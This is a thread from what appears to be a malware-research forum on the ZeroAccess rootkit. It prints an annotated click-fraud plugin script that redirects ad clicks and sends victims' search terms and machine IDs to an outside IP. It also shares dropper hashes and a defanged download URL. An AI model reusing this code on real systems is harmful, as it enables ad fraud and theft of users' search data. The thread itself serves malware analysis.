 #11165  by EP_X0FF
 Fri Jan 20, 2012 2:58 pm
markusg wrote:comes from infected pc
000000c0.@
13f707e9a8054d48837d28623a16196b
https://www.virustotal.com/file/68169f7 ... 327069533/
That's one of its plugins: a resource-only DLL with the script data embedded inside it.
<dat><jst>
// Plugin-level state, gathered once when the script is loaded.
// GetOS, GetCompId, GetCodeVersion and GetString are not defined in this
// listing; they are supplied by the host engine that runs the "jst" script.
// Every value here is copied verbatim into the URLs that getLocalPage()
// builds for the operator's servers (see the "sv=", "os=", "id="/"i=",
// "cv=" and "u="/"w=" query parameters there).
var sv = 15;                // presumably the script version; sent as "sv="
var os = GetOS();           // host-reported OS value; sent as "os="
var CompId = GetCompId();   // machine identifier from the host; sent as "id=" and "i="
var cv = GetCodeVersion();  // host code version; sent as "cv="
var u = GetString('u');     // opaque string read from host config; sent as "u=" and "w="

/**
 * Inspects one outbound HTTP request handed in by the host (the caller is
 * outside this listing; it looks like a traffic-filter hook — confirm) and
 * either answers the request itself through Reply() or leaves it alone.
 *
 * @param {*} s        handle passed straight to Reply(); presumably the client connection
 * @param {string} ref Referer of the request ("" when absent); compared against url
 * @param {string} url host + path of the request WITHOUT a scheme (the code
 *                     prepends "http://" to it when it needs a full URL)
 * @param {string} user User-Agent of the request; echoed into the beacon below
 * @returns {boolean} true when a response was written with Reply() (the
 *                    request was hijacked), false when nothing was sent
 *
 * Analyst notes — two behaviours, both keyed on URL patterns:
 *  1. Ad-click hijack: a "*.g.doubleclick.net/aclk?...&adurl=http..." request
 *     is answered with a 302 to 81.17.26.206 that carries CompId, u and the
 *     decoded real destination of the click.
 *  2. Search beacon: searches on Google/Bing/ICQ/Yahoo/Ask/AOL trigger a GET to
 *     "suzukimxm.cn" via SendRequest(), with the full search URL (query
 *     included) as the Referer. Google "/url?" result clicks are additionally
 *     answered with a 200 page that meta-refreshes back to the same URL.
 *
 * Throughout, "!x.indexOf(p)" is an idiom for x.startsWith(p) (indexOf == 0),
 * and "0 < x.indexOf(p)" requires p to appear after at least one character.
 * i, host, path and body are assigned without var and therefore become globals
 * in the host engine; keep that in mind if the host reads them afterwards.
 */
function getLocalPage(s, ref, url, user) 
{ 
	// Split at the first "/": url carries no scheme, so everything before it is
	// the host and the remainder (starting with "/") is the path.
	i = url.indexOf('/');
	host = url.substr(0, i);
	path = url.substr(i);
			
	// Branch 1: DoubleClick click-tracking redirect ("/aclk?...&adurl=http...").
	// The host check needs ".g.doubleclick.net" at index >= 1, i.e. preceded by
	// a subdomain label. The third test both finds "&adurl=http" and stores its
	// offset in i.
	if (0 < host.indexOf('.g.doubleclick.net') && !path.indexOf('/aclk?') && (0 < (i = path.indexOf('&adurl=http'))))
	{
      // Keep "&adurl=http..." up to, but not including, the next "&".
      path = path.substr(i);
      if (0 < (i = path.indexOf('&',1))) path = path.substr(0, i);
      // Answer the click ourselves: 302 to the operator's server. After
      // decodeURIComponent the tail reads "&adurl=http://<real target>", so the
      // operator receives CompId ("i="), u ("w=") and the genuine ad destination.
      // No-cache headers stop the browser from remembering this redirect.
      Reply(s, "HTTP/1.1 302\r\nLocation: http://81.17.26.206/g/google.php?&i="+ CompId + 
      "&w=" + u + decodeURIComponent(path) + 
      "\r\nConnection: close\r\nCache-Control: no-store, no-cache, must-revalidate, max-age=0\r\nPragma: no-cache\r\nContent-Length: 0\r\n\r\n");
      return true;
	}
					
	// Branch 2: search-engine traffic. Each line is one engine's result-page
	// URL shape. The second Google line matches result-click redirects
	// ("/url?...&q=...") but only when a Referer is present and differs from
	// the URL itself.
	if (
		(!host.indexOf('www.google.') && !path.indexOf('/search?')) ||
		(!host.indexOf('www.google.') && !path.indexOf('/url?') && 0 < path.indexOf('&q=') && ref != url && ref != "") ||
    (!host.indexOf('www.bing.com') && !path.indexOf('/search?')) ||
    (!host.indexOf('search.icq.com') && !path.indexOf('/search/results.php?q=')) ||
    (0 <= host.indexOf('search.yahoo.') && !path.indexOf('/search;')) ||
    (0 < host.indexOf('.ask.com') && !path.indexOf('/web?')) ||
    (!host.indexOf('search.aol.com') && !path.indexOf('/aol/search?'))
	)
	{
		// Beacon to the operator. 0xce1a1151 has the bytes 51 11 1a ce; read
		// little-endian that is 81.17.26.206, the same address used in the
		// redirect above — presumably the raw socket target (confirm against
		// the host's SendRequest), while the Host header names suzukimxm.cn.
		// The Referer is the victim's full search URL, so the search terms are
		// exfiltrated here; the victim's User-Agent is echoed as well.
		SendRequest(0xce1a1151, 
			"GET /r/redirect.php?id=" + CompId + "&u=" + u + 
			"&cv=" + cv + "&sv=" + sv + "&os=" + os + 
			" HTTP/1.0\r\nReferer: http://" + url + 
			"\r\nUser-Agent: " + user + 
			"\r\nHost: suzukimxm.cn\r\nConnection: close\r\n\r\n");
			
			// Google result clicks only: answer with a 200 page that reloads the
			// same URL after 1 s instead of forwarding the request. On that reload
			// ref would plausibly equal url, so the "/url?" condition above no
			// longer matches and the click goes through untouched — confirm.
			// Note url is inserted into the HTML unescaped.
			if (!path.indexOf('/url?'))
			{
        body = '<META http-equiv="refresh" content="1;URL=\'http://' + url + '\'">';
        Reply(s, "HTTP/1.1 200\r\nContent-Type: text/html\r\nConnection: close\r\nCache-Control: no-store, no-cache, must-revalidate, max-age=0\r\nPragma: no-cache\r\nContent-Length: " + body.length + "\r\n\r\n" + body);
        return true;
			}
	}

	// Nothing was written to s: plain searches (non-"/url?") still beaconed
	// above but are otherwise left for the caller to handle normally.
	return false;
}
</jst></dat>
 #11363  by rough_spear
 Tue Jan 31, 2012 11:43 am
Hi All, :D
ZAccess (ZeroAccess) dropper, very low detection at the time of posting. :twisted:
File name - 11.exe
VT link - https://www.virustotal.com/file/610aa19 ... /analysis/
SHA256: 610aa19ec762660b8b5a4bde4a9b9eb9ede453d70624d587c40ab3b11ff4b4dc
SHA1: 7e3a935e502aa1a0a30579542b2ca173db9d8156
MD5: 2e83d828313cdf3398512b29b8132a9a
File size: 264.0 KB ( 270336 bytes )

File name - X
VT link - https://www.virustotal.com/file/e9c6287 ... /analysis/
SHA256: e9c6287ad2216af395973cc3eb508bad8da885c08bd9a1271eb4c56c440d23c6
SHA1: beea09a2e91025d69cc225e8cd6cc45d71dceec7
MD5: 2092acd65e83775c735dba83ded42fcb
File size: 54.5 KB ( 55808 bytes )

web link - hxxp://hotlupdate.ru/11.exe

Regards,

rough_spear. ;)
Attachments
password - malware.
 #11396  by EP_X0FF
 Thu Feb 02, 2012 1:42 am
scettyscott wrote:Can someone provide me with the most recent version of this rootkit?
I'd like to learn more about it and potential removal procedures.

Hello,

any such "requests" will be removed.

Second attempt and I will ban you from this board and all your future accounts.


Post removed.